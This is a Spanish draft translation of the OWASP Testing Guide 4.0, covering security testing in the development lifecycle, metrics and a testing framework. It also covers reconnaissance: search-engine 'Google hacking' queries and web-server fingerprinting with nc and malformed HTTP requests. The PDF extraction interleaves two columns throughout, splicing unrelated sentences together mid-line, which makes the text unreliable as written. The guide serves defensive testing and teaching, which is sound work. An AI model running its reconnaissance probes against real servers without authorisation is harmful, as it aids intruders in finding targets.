decidir sobre la estrategia de mitigación. Por ejemplo, las vulnerabilidades de
El foco de una categorización de amenazas y defensas es definir los requisitos de mediano y alto riesgo pueden priorizarse para ser remediadas, mientras que las
seguridad en cuanto a las amenazas y la causa principal de la vulnerabilidad. de bajo riesgo se pueden arreglar en las siguientes versiones.
Una amenaza puede ser categorizada usando STRIDE [18] como Suplantación
de identidad, Manipulación, Repudio, revelación de Información, Negación de
servicio y Elevación de privilegios. La causa puede calificarse como falla de
seguridad en el diseño, un error de seguridad en la codificación o un problema Teniendo en cuenta los escenarios de amenaza de la explotación de
debido a una configuración insegura. Por ejemplo, la causa de la vulnerabilidad vulnerabilidades comunes, es posible identificar los riesgos potenciales que
de autenticación débil podría ser la falta de autenticación mutua cuando los datos deben probarse en el control de seguridad de la aplicación. Por ejemplo, las diez
cruzan un límite de confianza entre los niveles del cliente y de ensambles del vulnerabilidades más importantes de OWASP pueden ser direccionadas a
servidor de la aplicación. Un requisito de seguridad que capture la amenaza de ataques como el fraude electrónico (phishing), violaciones de privacidad, robo
no repudio durante una revisión del diseño de arquitectura permite la de identidad, sistema comprometido, alteración de datos o destrucción de datos,
documentación del requisito de defensa (por ejemplo, autenticación mutua) que pérdidas financieras y pérdida de reputación. Estos temas deberían documentarse
puede ser validada posteriormente con pruebas de seguridad. como parte de los escenarios de amenaza. Pensando en términos de amenazas y
vulnerabilidades, es posible diseñar una batería de pruebas que simulen estos
escenarios de ataque. Idealmente, la base de conocimientos de vulnerabilidades
de la organización puede utilizarse para derivar pruebas de seguridad dirigidas
Una categorización de amenazas y defensas para las vulnerabilidades puede por los casos de riesgos de seguridad para validar los escenarios de ataque más
utilizarse también para documentar requerimientos de seguridad de la probables. Por ejemplo, si el robo de identidad se considera de alto riesgo,
codificación segura como estándares de codificación seguras. Un ejemplo de un escenarios de prueba negativos deben validar la mitigación de los impactos
error de codificación común en los controles de autenticación consiste en aplicar
derivados de la explotación de las vulnerabilidades de autenticación, controles • La plantilla de restablecimiento de contraseña debe validar el nombre de
criptográficos, validación del ingreso y controles de validación. usuario y el email del usuario registrado antes de enviar la contraseña temporal
del usuario por correo electrónico. La contraseña temporal emitida debe ser una
contraseña de un solo uso. Se enviará un enlace a la página de restablecimiento
de contraseña al usuario. La página de restablecimiento de contraseña debe
validar la contraseña temporal del usuario, la contraseña nueva, así como la
respuesta del usuario a la pregunta de desafío.
Para validar los requisitos de seguridad con pruebas de seguridad, estos deben
Los requisitos negativos son más difíciles de probar, porque no hay ningún
estar impulsados por la función y necesitan resaltar la funcionalidad esperada (el
comportamiento esperado que se pueda buscar. Esto podría requerir que un
qué) e implícitamente la implementación (el cómo). Ejemplos de requisitos de
analista de amenazas cree causas y condiciones de entradas imprevisibles. Aquí
diseño de alto nivel de seguridad para la autenticación pueden ser:
es donde las pruebas de seguridad deben ser conducidas por el análisis de riesgo
y modelo de amenazas. La clave es documentar los escenarios de amenaza y la
funcionalidad de la defensa como factor para mitigar una amenaza.
hipótesis de prueba negativa. Un árbol de amenazas asumirá un ataque a la raíz Paso 1: Describa la situación funcional: El usuario autentica el ingreso mediante
(por ejemplo, el atacante podría ser capaz de leer mensajes de otros usuarios) e el suministro de un nombre de usuario y contraseña. La aplicación permite el
identificar las diferentes debilidades de los controles de seguridad (por ejemplo, acceso a los usuarios, basada en la autenticación de credenciales del usuario por
la validación de datos falla debido a una vulnerabilidad de inyección SQL) y las parte de la aplicación y proporciona errores específicos al usuario cuando la
defensas necesarias (por ejemplo, implementar la validación de datos y consultas validación falla.
parametrizadas) que pudieran ser validadas en su eficacia en la mitigación de
este tipo de ataques.
1) Las contraseñas deben ser alfanuméricas, mayúsculas y minúsculas y un Después de que los componentes y los cambios en el código son probados por
mínimo de longitud de siete caracteres; los desarrolladores y registrados en la estructura de la aplicación, el siguiente
paso, más probablemente en el flujo de trabajo del proceso de desarrollo de
2) Las cuentas deben bloquearse después de cinco intentos de registro sin éxito; software, es realizar pruebas en la aplicación como una entidad completa. Este
nivel de prueba se conoce generalmente como prueba integrada y prueba de
3) Los mensajes de error de registro deben ser genéricos. nivel de sistema. Cuando las pruebas de seguridad son parte de estas actividades
de pruebas, pueden utilizarse para validar la funcionalidad de seguridad de la
aplicación como un todo, así como la exposición a vulnerabilidades a nivel de
aplicación. Estas pruebas de seguridad en la aplicación incluyen tanto las
Estos requisitos de seguridad deben ser documentados y probados. pruebas de Caja Blanca como el análisis de código fuente; y las pruebas de Caja
Negra como pruebas de penetración. Las pruebas de Caja Gris son similares a
las pruebas de Caja Negra. En una prueba de Caja Gris se supone que el
evaluador tiene un conocimiento parcial sobre el manejo de la sesión de la
aplicación y que debe ayudar a entender si el registro de salida y funciones de
Las pruebas de seguridad integradas al desarrollo y flujos
tiempo de caducidad están bien aseguradas.
de trabajo de las pruebas de seguridad
El objetivo de las pruebas de seguridad es el sistema completo que será Desde la perspectiva del desarrollador, el principal objetivo de las pruebas de
potencialmente atacado e incluye el código fuente completo y el seguridad es validar que el código esté siendo desarrollado de acuerdo con los
requisitos de las normas de codificación segura. Los artefactos de codificación
de los desarrolladores (como las funciones, métodos, clases, APIs y bibliotecas)
deben ser validados funcionalmente antes de integrarse a la construcción de la
ejecutable. Una ventaja de las pruebas de seguridad durante esta fase de prueba aplicación.
es que es posible para los evaluadores de seguridad determinar si las
vulnerabilidades pueden ser explotadas y exponen a la aplicación a riesgos
reales. Esto incluye tanto a vulnerabilidades de aplicaciones web comunes como
a problemas de seguridad que se han identificado más temprano en el SDLC con Los requisitos de seguridad que los desarrolladores tienen que seguir deben ser
otras actividades como el modelo de amenazas, el análisis de código fuente y documentados en los estándares de codificación seguros y validados con el
revisiones de seguridad del código. análisis estático y dinámico. Si la actividad de la unidad de pruebas sigue una
revisión de códigos seguros, las pruebas de unidad pueden validar que los
cambios requeridos por las revisiones de seguridad de códigos se hayan
implementado correctamente. Las revisiones de seguridad de códigos y análisis
Por lo general, son los ingenieros de pruebas, no los desarrolladores de software, de código fuente a través de las herramientas de análisis de código fuente ayudan
quienes realizan las pruebas de seguridad cuando la aplicación está en la mira de a los desarrolladores en la identificación de problemas de seguridad en el código
las pruebas del sistema de integración. Estos ingenieros de pruebas tienen fuente mientras se desarrolla. Mediante el uso de pruebas de
conocimientos de seguridad acerca de vulnerabilidades de aplicaciones web,
técnicas de pruebas de seguridad de Caja Negra y Caja Blanca y dominan la
validación de requisitos de seguridad en esta fase. Para poder realizar estas
pruebas de seguridad, es un prerrequisito que los casos de pruebas de seguridad unidad y análisis dinámico (p. ej., depuración) los desarrolladores pueden validar
estén documentados en la guía y procedimientos de pruebas de seguridad. la funcionalidad de seguridad de los componentes, así como verificar que las
defensas que están siendo desarrolladas mitigan cualquier riesgo de seguridad
identificado previamente a través de la creación de modelos de amenazas y el
análisis de código fuente.
Un ingeniero de pruebas que valida la seguridad de la aplicación en el entorno
del sistema integrado podría liberar a la aplicación para ser probada en el entorno
operativo (por ejemplo, pruebas de aceptación del usuario). En esta etapa de
SDLC (es decir, validación), las pruebas funcionales de la aplicación son Una buena práctica de los desarrolladores es crear casos de prueba de seguridad
generalmente una responsabilidad de evaluadores QA, mientras que los hackers como un conjunto de pruebas de seguridad genéricas que forma parte del
de sombrero blanco o consultores de seguridad son generalmente responsables framework de pruebas de la unidad. Un conjunto de pruebas de seguridad
de las pruebas de seguridad. Algunas organizaciones se apoyan en su propio genérico puede derivarse de casos de uso correcto y mal uso previamente
equipo de hackers éticos especializados para llevar a cabo este tipo de pruebas definidos como funciones, métodos y clases. Un conjunto de pruebas de
cuando una evaluación externa no es necesaria (por ejemplo, para propósitos de seguridad genérica puede incluir casos de prueba de seguridad para validar tanto
auditoría). requisitos positivos como negativos para los controles de seguridad, tales como:
Puesto que estas pruebas son el último recurso para solucionar vulnerabilidades • Identidad, autenticación y control de acceso
antes de que la aplicación sea lanzada a la producción, es importante que estos
temas sean abordados según lo recomendado por el equipo de pruebas. Las • Validación de ingreso y codificación
recomendaciones pueden incluir cambios de código, diseño o configuración. En
este nivel, los auditores de seguridad y los oficiales de seguridad de la • Encriptado
información discuten sobre los temas de seguridad reportados y analizan los
riesgos potenciales según los procedimientos de gestión de riesgo de la • Administración de usuarios y sesión
información. Tales procedimientos pueden requerir que el equipo de desarrollo
corrija todas las vulnerabilidades de alto riesgo antes de que la aplicación sea • Manejo de errores y excepciones
liberada, a menos que tales riesgos sean reconocidos y aceptados.
• Auditoría y registro
pruebas de seguridad pueden ejecutarse para identificar posibles problemas de seguridad del desarrollador. Cuando se implementa una solución para un defecto
seguridad que tienen su causa principal en el código fuente. de codificación identificado mediante el análisis de código fuente; por ejemplo,
los casos de pruebas de seguridad, puede verificar que la aplicación del cambio
de código sigue los requisitos de codificación segura, documentados en los
estándares de codificación seguros.
Además de la validación de parámetros de entrada y salida, que entran y salen
de los componentes, estos temas incluyen verificaciones de autenticación y
autorización realizadas por el componente, protección de los datos dentro del
componente, excepción segura y manejo de errores y garantizar la auditoría y el Las pruebas de análisis de código fuente y de unidad pueden validar que el
registro. Los frameworks de la unidad de prueba tales como Junit, Nunit y Cunit cambio de código mitiga la vulnerabilidad expuesta por el defecto de
se pueden adaptar para verificar los requisitos de la prueba de seguridad. En el codificación previamente identificado. Los resultados del análisis automatizado
caso de pruebas funcionales de seguridad, las pruebas de nivel de unidad pueden de codificación segura también pueden utilizarse como puertas automáticas de
probar la funcionalidad de los controles de seguridad al nivel de componentes de entrada para el control de la versión del software, por ejemplo, los artefactos del
software, tales como las funciones, métodos o clases. Por ejemplo, un caso de software no pueden verificarse dentro de la estructura si existen temas de alto o
prueba puede verificar la validación de entrada y salida (por ejemplo, mediano grado de severidad.
saneamiento de variables) y verificación de límites para las variables, afirmando
la funcionalidad esperada del componente.
Los casos de pruebas de seguridad a nivel de unidad pueden ser desarrollados Los escenarios de ataque real pueden analizarse tanto con técnicas manuales de
por un ingeniero de seguridad que es el experto en la materia de seguridad de pruebas como con herramientas de prueba de penetración. Las pruebas de
software y también es responsable de validar que los temas de seguridad en el seguridad de este tipo se denominan también pruebas de hacking ético. Desde la
código fuente se han corregido y se pueden comprobar en la estructura del perspectiva de pruebas de seguridad, éstas son direccionadas por el riesgo y
sistema integrado. Normalmente, el administrador de la construcción de la tienen el objetivo de probar la aplicación en el entorno operativo. El objetivo es
aplicación también se asegura de que archivos ejecutables y bibliotecas de la estructura de la aplicación representativa de aquella versión que será
terceros sean evaluados en busca de vulnerabilidades potenciales antes de implementada en la producción.
integrarlos en la estructura de las aplicaciones.
Por ejemplo, las vulnerabilidades encontradas en el código fuente mediante el Los datos de pruebas de seguridad pueden ser absolutos, como el número de
análisis del código fuente representan una medida inicial del riesgo. Una medida vulnerabilidades detectadas durante la revisión de código manual; así como
de riesgo (p. ej., alta, media, baja) de la vulnerabilidad puede calcularse comparativo, como el número de vulnerabilidades detectadas durante las
mediante la determinación de los factores de exposición y probabilidad, revisiones de código comparadas con las pruebas de penetración. Para responder
validando la vulnerabilidad con pruebas de penetración. Las métricas de riesgo a preguntas sobre la calidad del proceso de seguridad, es importante determinar
asociadas a vulnerabilidades encontradas con las pruebas de seguridad dan el una línea base para lo que podría considerarse aceptable y bueno. Los datos de
poder a la gestión de negocio para poder tomar decisiones de riesgo, tales como pruebas de seguridad también pueden apoyar objetivos específicos del análisis
para decidir si los riesgos pueden ser aceptados, mitigados o transferidos a de seguridad. Estos objetivos podrían ser el cumplimiento de las normas de
diferentes niveles dentro de la organización (por ejemplo, de negocios, así como seguridad y estándares de seguridad de la información, los procesos de gestión
los riesgos técnicos). de la seguridad, la identificación de causas principales de seguridad y mejoras en
los procesos y el análisis de costo- beneficio de la seguridad.
• reducir el número total de vulnerabilidades en un 30% • ¿ ué tipo de pruebas de seguridad son más eficaces para detectar
vulnerabilidades (por ejemplo, Caja Blanca versus Caja Negra)?
• solución de temas de seguridad en un determinado plazo (por ejemplo, antes
del lanzamiento de la beta) • ¿Cuántos problemas de seguridad se encuentran durante las revisiones de
seguridad del código?
Incluso las más sofisticadas herramientas de automatización no son competencia Informar la causa principal del problema puede ayudar a identificar lo que necesita
para un evaluador de seguridad experimentado. Sólo confiar en los resultados de ser corregido. En el caso de una prueba de Caja Blanca, por ejemplo, la causa de
pruebas exitosas de las herramientas de automatización les dará a los seguridad principal de la vulnerabilidad del software será transgredir el código
profesionales de la seguridad una falsa sensación de seguridad. Por lo general, fuente.
mientras más experimentados son los evaluadores de seguridad en la
metodología de pruebas de seguridad y herramientas de prueba, mejores serán
los resultados de las pruebas de seguridad y análisis. Es importante que los
gerentes que realizan una inversión en herramientas de pruebas de seguridad Una vez que se reportan los problemas, también es importante proporcionar
también consideren una inversión en la contratación de recursos humanos orientación al desarrollador de software para que pueda volver a probar y encontrar
calificados, así como en capacitación para pruebas de seguridad. la vulnerabilidad. Esto podría significar usar una técnica de prueba de Caja Blanca
(por ejemplo, revisión del código de seguridad con un analizador de código
estático) para encontrar si el código es vulnerable. Si se encuentra una
vulnerabilidad a través de una técnica de Caja Negra (prueba de penetración), el
Reporte de requerimientos informe de prueba también debe proporcionar información sobre cómo validar la
exposición de la vulnerabilidad en el extremo delantero (por ejemplo, cliente).
La postura de seguridad de una aplicación puede ser caracterizada desde la
perspectiva del efecto, tal como el número de vulnerabilidades y la calificación
de riesgo de las vulnerabilidades, así como desde la perspectiva de la causa u
origen, tales como problemas de codificación, fallos arquitectónicos y errores de La información acerca de cómo solucionar la vulnerabilidad debe ser detallada
configuración. suficientemente para que un desarrollador pueda implementar una solución. Debe
dar ejemplos de codificación segura, cambios en la configuración y proporcionar
referencias adecuadas.
Para que las métricas de pruebas de seguridad sean útiles, deben proporcionar valor
a los depositarios o accionistas de los datos de las pruebas de seguridad de la
• La categorización de cada tipo de vulnerabilidad organización. Los accionistas pueden incluir gerentes de proyecto, desarrolladores,
oficinas de seguridad de información, auditores y oficiales principales de
• La amenaza a la seguridad que expone el tema
información. El valor puede ir en términos de la rentabilidad que tiene cada [1] T. DeMarco, Controlling Software Projects: Management, Measurement
accionista del proyecto, en términos del rol y la responsabilidad. and Estimation, Yourdon Press, 1982
Los desarrolladores de software buscan demostrar, en los datos de pruebas de [3] NIST, The economic impacts of inadequate infrastructure for software
seguridad, que el software está codificado de una manera más segura y eficiente. testing - nist.gov
Esto les permite apoyar el caso para usar herramientas de análisis de código fuente,
así como seguir estándares de codificación y asistir a entrenamientos de seguridad [4] Ross Anderson, Economics and Security Resource Page - cl.cam.ac.uk
de software.
[5] Denis Verdon, Teaching Developers To Fish - OWASP AppSec NYC
2004
Los gerentes de proyecto buscan datos que les permitan administrar y utilizar las [6] Bruce Schneier, Cryptogram Issue #9 - schneier.com
actividades y recursos de las pruebas de seguridad, de acuerdo al plan del proyecto
de seguridad. Para los jefes de proyecto, los datos de las pruebas de la seguridad [7] Symantec, Threat Reports - symantec.com
pueden mostrar los proyectos que están dentro del cronograma, avanzar de acuerdo
al objetivo de las fechas de entrega y mejorar durante las pruebas. [8] FTC, The Gramm-Leach Bliley Act - business.ftc.gov
Los datos de pruebas de seguridad también ayudan al caso del negocio cuando la [10] European Union, Directive 96/46/EC on the protection of individuals
iniciativa proviene de agentes de seguridad de la información (ISO). Por ejemplo, with regard to the processing of personal data and on the free movement of
puede proporcionar evidencia de que las pruebas de seguirdad durante el SDLC no such data - ec.europa.eu
afectan la ejecución de los proyectos; más bien reducen la carga de trabajo total
necesaria para atacar vulnerabilidades que se presentarán más adelante en la [11] NIST, Risk management guide for information technology systems -
producción. csrc.nist.gov
proporcionan un nivel de garantía, seguridad y confianza del software que cumple [14] Gary McGraw, Beyond the Badness-ometer - drdobbs.com
con el estándar, a través de los procesos de revisión de seguridad dentro de la
organización. [15] FFIEC, Authentication in an Internet Banking Environment -
www.ffiec.gov
Referencias [21] MITRE, Being Explicit About Weaknesses, Slide 30, Coverage of CWE
- cwe.mitre.org
[22] Marco Morana, Building Security Into The Software Life Cycle, A Business Case - blackhat.com
3 Esta sección describe un framework de pruebas típico que puede desarrollarse dentro de una
organización. Puede ser visto como un framework referencial que comprende técnicas y tareas
que son apropiadas en diferentes fases del ciclo de vida de desarrollo del software (SDLC).
Esta sección pretende ayudar a las organizaciones a construir un proceso • Durante la definición y diseño
completo de análisis estratégico y no está dirigida a consultores o contratistas
que tienden a ser más tácticos en las zonas específicas de la prueba. •.Durante el desarrollo
• Durante la implementación
Es fundamental entender por qué se debe crear un framework de pruebas de • Mantenimiento y operaciones
inicio a fin; la respuesta es porque es crucial para evaluar y mejorar la seguridad
del software. En la escritura de código seguro, Howard y LeBlanc cuentan que
emitir un boletín de seguridad le cuesta a Microsoft por lo menos $100.000, y les
cuesta colectivamente a sus clientes mucho más que eso el aplicar los parches de Fase 1: Antes del inicio del desarrollo
seguridad. También observan que el sitio web de delitos informáticos del
Fase 1.1: Defina un SDLC
gobierno de Estados Unidos (http://www.justice.gov/criminal/cybercrime/)
detalla recientes casos criminales y la pérdida de las organizaciones. Las
Antes del inicio del desarrollo de aplicaciones, un SDLC adecuado debe ser
pérdidas comunes superan con creces los USD $100.000.
definido donde la seguridad es inherente en cada etapa.
Con una economía como esta, no es de extrañarse por qué los proveedores de
Fase 1.2: Revise las políticas y estándares
software pasan de realizar únicamente pruebas de seguridad de Caja Negra, que
sólo se puede realizar en las aplicaciones que ya se han desarrollado, a
Asegúrese de que existen adecuadas políticas, estándares y documentación en el
concentrarse en las pruebas en los primeros ciclos del desarrollo de aplicaciones
lugar. La documentación es extremadamente importante ya que da a los equipos las
tales como la definición, diseño y desarrollo.
pautas de desarrollo y las políticas que pueden seguir.
proceso como en el producto. Es esencial definir las métricas antes de que Las aplicaciones deben tener una arquitectura y diseño documentados. Esta
comience el desarrollo, ya que puede haber la necesidad de modificar el proceso documentación puede incluir modelos, documentos textuales y otros artefactos
con el fin de capturar los datos. similares. Es esencial probar estos artefactos para asegurar que el diseño y la
arquitectura de la aplicación mantienen el nivel adecuado de seguridad según lo
definido en los requisitos.
Fase 2.1: Revise los requisitos de seguridad Identificar fallas de seguridad en la fase de diseño no sólo es uno de los momentos
más eficientes en costo para identificar fallas, sino que puede ser uno de los
Los requisitos de seguridad definen cómo funciona una aplicación desde momentos más eficaces para realizar cambios. Por ejemplo, si se identifica que el
diseño exige autorización para las decisiones en varios lugares, puede ser apropiado
considerar un componente de autorizaciones centralizado. Si la aplicación realiza
una validación de datos en múltiples lugares, puede ser apropiado desarrollar un
una perspectiva de seguridad. Es esencial que los requerimientos de seguridad marco de validación central (es decir, la validación de correcciones en un solo
sean probados. Probar, en este caso, significa verificar los supuestos que se lugar, en vez de cientos de lugares; es mucho más económico).
hacen en los requisitos y las pruebas para ver si hay diferencias en las
definiciones de los requisitos.
• Responsabilidad
arquitectura con el arquitecto de sistemas para modificar el diseño.
• Administración de sesiones
• Seguridad de transporte
Fase 3: Durante el desarrollo
• Segregación de sistema de información en niveles
En teoría, el desarrollo es la aplicación de un diseño. Sin embargo, en el mundo
• Cumplimiento de legislación y estándares (incluidas las normas de privacidad,
real, muchas decisiones de diseño se realizan durante el desarrollo de la
gubernamentales e industria)
codificación. Son, a menudo, decisiones pequeñas que eran demasiado detalladas
para ser descritas en el diseño, o temas donde no se ofrecieron políticas o
estándares de orientación. Si el diseño y la arquitectura no fueran adecuados, el
desarrollador se enfrentará a muchas decisiones. Si hay normas y políticas
Fase 2.2: Revise el diseño y arquitectura
insuficientes, el desarrollador se enfrentará aún a más decisiones.
Para más información sobre las listas OWASP, por favor consulte la guía de
OWASP para Seguridad de Aplicaciones Web, o la última edición de la OWASP
Fase 3.1: Camine a través del código Top 10.
El equipo de seguridad debería realizar una "caminata" a través del código con los
desarrolladores y, en algunos casos, los arquitectos del sistema. Una caminata a
través del código es un recorrido de alto nivel a través del código, donde los Fase 4: Durante la fase de implementación
desarrolladores pueden explicar la lógica y el flujo del código implementado. Esta
caminata permite al equipo de revisión de código obtener una comprensión general Fase 4.1: Prueba de aplicación y penetración
del código y permite a los desarrolladores explicar por qué ciertas cosas se
desarrollaron de la manera en que lo hicieron. Habiendo probado los requisitos, analizado el diseño y realizada la revisión de
código, se puede suponer que todos los temas han sido cubiertos. Esperemos que
este sea el caso, pero realizar pruebas de penetración de la aplicación después de
que se ha implementado proporciona una última comprobación para asegurarse
El propósito no es realizar una revisión de código, sino entender en un nivel alto el de que nada se ha escapado.
flujo, el diseño y la estructura del código que compone la aplicación.
Armado con una buena comprensión de cómo está estructurado el código y por qué
ciertas cosas fueron codificadas de la manera en que lo fueron, el evaluador puede Fase 4.2: Pruebas de gestión de configuración
examinar ahora el código real en busca de defectos de seguridad.
La prueba de penetración de la aplicación debe incluir la comprobación de cómo
la infraestructura fue implementada y asegurada. Aunque la aplicación puede ser
segura, un pequeño aspecto de la configuración podría estar todavía en una fase
Las revisiones de código estático validan el código con una serie de listas de de instalación por defecto y ser vulnerable a la explotación.
verificación, que incluyen:
En términos del retorno sobre los recursos invertidos (sobre todo tiempo), las
revisiones de código estático producen rendimientos de mayor calidad que
cualquier otro método Etapa 5.3: Garantice la verificación después del cambio
Pruebas de Seguridad de
4 Aplicaciones Web
Las siguientes secciones describen las 12 categorías de la Metodología de
Pruebas de Penetración de una Aplicación Web.
Pruebas: Introducción y objetivos • Abierto: cada experto en seguridad puede participar con su experiencia en el
proyecto. Todo es gratis.
Esta sección describe la metodología OWASP de pruebas de seguridad de
aplicaciones web y explica cómo evaluar para encontrar evidencias de • Colaborativo: Se realizan lluvias de ideas antes de que los artículos sean escritos,
vulnerabilidades dentro de la aplicación, debido a las deficiencias de los así el equipo puede compartir ideas y desarrollar una visión colectiva del proyecto.
controles de seguridad identificados. Esto significa un consenso básico, un público más amplio y mayor participación.
¿Qué son las pruebas de seguridad de aplicaciones web? Este enfoque tiende a crear una metodología de pruebas definida que será:
Las pruebas de seguridad nunca serán una ciencia exacta donde se puede definir
¿Qué es una amenaza?
una lista completa de todos los temas posibles que deben ser probados. De hecho,
las pruebas de seguridad son sólo una técnica apropiada para probar la seguridad de
Una amenaza es cualquier cosa (un atacante malintencionado externo, un usuario
aplicaciones web bajo ciertas circunstancias. El objetivo de este proyecto es recoger
interno, una inestabilidad del sistema, etc.) que puedan dañar los activos propios
todas las técnicas de pruebas posibles, explicar estas técnicas y mantener la guía
de una aplicación (recursos de valor como los datos en una base de datos o en el
actualizada. El método de pruebas de seguridad de aplicaciones Web OWASP se
sistema de archivos) mediante la explotación de una vulnerabilidad.
basa en el enfoque de Caja Negra. El evaluador no sabe nada o tiene muy poca
información sobre la aplicación a probar.
Una prueba es una acción que permite demostrar que una aplicación cumple con
los requisitos de seguridad de sus grupos de interés.
El modelo de prueba consiste de: El conjunto de pruebas activas se han dividido en 11 categorías para un total de 91
controles:
• Evaluador: uien realiza las actividades de prueba
• Pruebas de autenticación
• Fase 1 Modo pasivo:
• Pruebas de autorización
En el modo pasivo, el evaluador intenta comprender la lógica de la aplicación y
juega con la aplicación. Se pueden utilizar herramientas para la recopilación de • Pruebas de gestión de sesión
información. Por ejemplo, un proxy HTTP puede ser utilizado para observar todas
las solicitudes y respuestas HTTP. Al final de esta fase, el evaluador debe • Pruebas de validación de ingreso
comprender todos los puntos de acceso (puertas) de la aplicación (por ejemplo,
encabezados HTTP, parámetros y cookies). La sección de Recolección de • Manejo de errores
Información explica cómo realizar una prueba de modo pasivo.
• Criptografía
https://www.example.com/login/Authentic_Form.html
Pruebas de la recopilación de la información
contenido, no han sido utilizadas, entonces es posible que los índices incluyan • ixquick/Startpage
contenido web cuya inclusión no estaba prevista por parte de los propietarios. Los
propietarios de páginas web pueden utilizar el mencionado robots.txt, meta • Google
etiquetas HTML, autenticación y herramientas proporcionados por los motores de
búsqueda para eliminar dicho contenido. • Shodan
• PunkSpider
Objetivos de la prueba
Para entender qué información sensible del diseño y configuración de la Duck Duck Go y ixquick/Startpage proveen información limitada al respecto de
aplicación/sistema/organización está expuesta directamente (en la página web de fugas del evaluador.
la organización) o indirectamente (en un sitio web de terceros).
• Diagramas de red y configuraciones El Google SOAP Search API soporta el doGetCachedPage y los mensajes SOAP
de doGetCachedPageResponse asociado [3] para ayudar a recuperar páginas en
• Mensajes archivados y mensajes de correo electrónico caché. Una implementación de esto está en desarrollo por OWASP en el proyecto
"Google Hacking".
• Contenido de mensajes de error Por ejemplo, para encontrar el contenido de la web de owasp.org indexado por un
motor de búsqueda típico, la sintaxis requerida es:
• Desarrollo, prueba, UAT escenificando las versiones de la página web
Operadores de búsqueda
• Baidu
• binsearch.info
• Bing
• Duck Duck Go
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
39
Guia de pruebas 4.0 "Borrador"
Herramientas
Referencias
Web
[1] “Google Basics: Learn how Google Discovers, Crawls, and Serves Web
Pages” - support.google.com
La base de datos de Google Hacking es una lista muy útil de consultas de búsqueda
[3] “Google Hacking Database”: exploit-db.com
de Google. Las consultas se ponen en varias categorías:
Remediación
• Puntos de apoyo o bases de apoyo
Considere cuidadosamente la sensibilidad de la información del diseño y
• Archivos que contienen nombres de usuario
configuración antes de publicarla en línea.
• Directorios sensibles
• Servidores vulnerables
• Archivos que contienen contraseñas El utilizar huellas digitales en el servidor web es una tarea fundamental para
Del campo del servidor, se puede entender que el servidor es muy probablemente
Apache, versión 1.3.3, y que corre sobre un sistema operativo Linux.
Esta información se puede derivar enviando al servidor web comandos específicos
y analizando la respuesta de salida, como cada versión de software del servidor
Cuatro ejemplos de los encabezados de respuesta HTTP se indican a continuación:
web puede responder de manera distinta a estos comandos. Sabiendo cómo
responde cada tipo de servidor web a comandos específicos y manteniendo esta
información en una base de datos de huellas digitales de servidores web, un
evaluador de penetración puede enviar estos comandos al servidor web, analizar la
De un servidor Apache 1.3.23:
respuesta y compararla con la base de datos de firmas conocidas.
Tenga en cuenta que generalmente necesita varios comandos diferentes para HTTP/1.1 200 OK
identificar con precisión el servidor web, cómo las diferentes versiones pueden
reaccionar de manera similar para el mismo comando. Raramente las diferentes Date: Sun, 15 Jun 2003 17:10: 49 GMT
versiones reaccionan de la misma manera a todos los comandos HTTP; por lo que
mediante el envío de varios comandos diferentes, el evaluador puede aumentar la Server: Apache/1.3.23
precisión de su conjetura.
Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT
ETag: 32417-c4-3e5d8a83
Objetivos de las pruebas
Accept-Ranges: bytes
Encontrar la versión y el tipo de servidor web en ejecución para determinar
Content-Length: 196
vulnerabilidades conocidas y la manera de explotarlas para usar durante la prueba.
Connection: close
Cómo probar
HTTP/1.1 200 OK
En este caso, el campo de servidor de esa respuesta es ofuscado. El evaluador no
Server: Microsoft-IIS/5.0 puede saber qué tipo de servidor web se ejecuta basado en dicha información.
HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Content-type: text/HTML
Comportamiento de protocolo
Last-modified: Wed, 31 Jul 2002 15:37: 56 GMT
Técnicas de comportamiento más refinadas toman en cuenta diversas
Content-length: 57 características de los varios servidores web disponibles en el mercado. Abajo está
una lista de algunas metodologías que permiten a los evaluadores deducir el tipo de
Accept-ranges: bytes servidor web que está en uso.
Content-length: 1186
Content-type: text/html
Accept-Ranges: bytes
$ nc apache.example.com 80 $ nc netscape.example.com 80
Connection: close
$ nc iis.example.com 80 $ nc sunone.example.com 80
Podemos notar que el orden de los campos de fecha y servidor difieren entre
Apache, Netscape Enterprise y IIS.
Otra prueba útil para ejecutar consiste en enviar solicitudes con formato incorrecto
o páginas inexistentes al servidor. Considere las siguientes respuestas HTTP.
Server: Sun-ONE-Web-Server/6.1
HTTP/1.1 400 Bad Request
Date: Tue, 16 Jan 2007 15:25:00 GMT
Date: Sun, 15 Jun 2003 17:12: 37 GMT
Content-length: 0
Server: Apache/1.3.23
Content-type: text/html
Connection: close
Transfer: chunked
Podemos notar que cada servidor responde de forma diferente. La respuesta
también es diferente, dependiendo de la versión del servidor. Observaciones
Respuesta de IIS 5.0 similares se pueden hacer creando peticiones con un método HTTP
inexistente. Considere las siguientes respuestas:
$ nc iis.example.com 80
GET / HTTP/3.0
Respuesta de Apache 1.3.23
HTTP/1.1 200 OK
$ nc apache.example.com 80
Server: Microsoft-IIS/5.0
GET / JUNK/1.0
Content-Location: http://iis.example.com/Default.htm
HTTP/1.1 200 OK
Date: Fri, 01 Jan 1999 20:14: 02 GMT
Date: Sun, 15 Jun 2003 17:17: 47 GMT
Content-Type: text/HTML
Server: Apache/1.3.23
Accept-Ranges: bytes
Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT
Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMT
ETag: 32417-c4-3e5d8a83
Respuesta de Netscape Enterprise 4.
Accept-Ranges: bytes
GET / HTTP/3.0
Server: Netscape-Enterprise/4.1
Content-length: 140
Content-type: text/HTML
• Desenmascarame - desenmascara.me
$ nc iis.example.com 80
GET / JUNK/1.0
Server: Microsoft-IIS/5.0
Content-Type: text/HTML
Content-Length: 87
Pruebas automatizadas
<HTML><HEAD><TITLE>Bad request</TITLE></HEAD>
A continuación se muestra un ejemplo de httprint en funcionamiento:
<BODY><H1>Bad request</H1>
$ nc sunone.example.com 80
GET / JUNK/1.0
<HTML><HEAD><TITLE>Bad request</TITLE></HEAD>
<BODY><H1>Bad request</H1>
Herramientas
• httprecon - computec.ch Las herramientas en línea se pueden utilizar si el evaluador quiere probar más
sigilosamente y no desea conectarse directamente a la página web objetivo.
• Netcraft - netcraft.com Un ejemplo de una herramienta en línea que ofrece a menudo una gran
cantidad de información sobre servidores web objetivos es Netcraft. Con esta
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
45
Guia de pruebas 4.0 "Borrador"
herramienta podemos recuperar información acerca del sistema operativo, Proteja la capa de presentación del servidor web detrás de un proxy inverso
